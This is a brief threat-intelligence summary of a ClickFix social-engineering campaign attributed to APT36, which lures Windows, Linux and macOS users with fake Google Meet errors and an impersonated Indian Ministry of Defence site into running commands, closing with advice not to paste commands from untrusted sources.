A new ClickFix attack campaign has been observed targeting Windows, Linux, macOS, and even web users by using social engineering techniques that trick victims into executing malicious commands. This campaign is linked to the APT36 group and employs impersonation tactics involving fake government websites to infect systems with information-stealing malware or perform other malicious activities.
Affected: Windows, Linux, macOS, Web users
Affected: Windows, Linux, macOS, Web users
Keypoints
- ClickFix is a social engineering attack that manipulates users to execute malicious commands by mimicking verification systems or error messages.
- Historically targeting Windows, recent campaigns have expanded to include macOS and Linux systems.
- The 2024 campaign involves fake Google Meet errors and impersonates Indiaβs Ministry of Defence to lure victims.
- Attacks on Windows involve executing PowerShell scripts that download malware or ransomware, while Linux attacks use shell commands to fetch images or potentially malicious scripts.
- Linux victims are prompted to run commands via the ALT+F2 run dialog, leading to the download of non-malicious payloads that could be replaced with harmful code.
- The targeting group, APT36, appears to be testing and adapting their methods across different operating systems, indicating increasing sophistication.
- Users are advised to avoid executing commands from untrusted sources and verify the safety of commands before pasting them into system terminals.